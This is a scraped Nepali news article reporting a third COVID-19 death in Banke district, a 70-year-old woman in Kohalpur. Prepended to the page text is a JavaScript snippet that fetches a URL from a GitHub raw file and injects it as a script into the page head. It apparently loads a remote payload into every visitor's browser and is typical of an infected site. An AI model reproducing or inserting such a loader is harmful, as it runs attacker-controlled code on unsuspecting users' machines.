;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोरोनाका कारण बाँकेमा तेस्रो व्यक्तिको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कोरोनाका कारण बाँकेमा तेस्रो व्यक्तिको मृत्यु
जुनेली बिशेष

कोरोनाका कारण बाँकेमा तेस्रो व्यक्तिको मृत्यु

कोरोना

साउन २५,

बाँके । कोरोना संक्रमणका कारण जिल्लामा तेस्रो व्यक्तिको मृत्यु भएको छ ।
प्रमुख जिल्ला अधिकारी राम बहादुर कुरुम्वाङका अनुसार नेपालगञ्ज मेडिकल कलेज कोहलपुरमा आइतबार दिउँसो ३ बजे कोरोना संक्रमित कोहलपुर वडा नं–२ की एक ७० वर्षीया महिलाको मृत्यु भएको हो ।

बाँकेमा यो संगै कोरोना संक्रमणका कारण मृत्यु हुनेको संख्या तीन पुगेको छ । यसअघि बाँकेको नरैनापुर गाउँपालिकाका एक पुरुष तथा बैजनाथ गाउँपालिकाकी एक महिलाको मृत्यु भइसकेको छ । file photo

फेसबुक प्रतिक्रियाहरु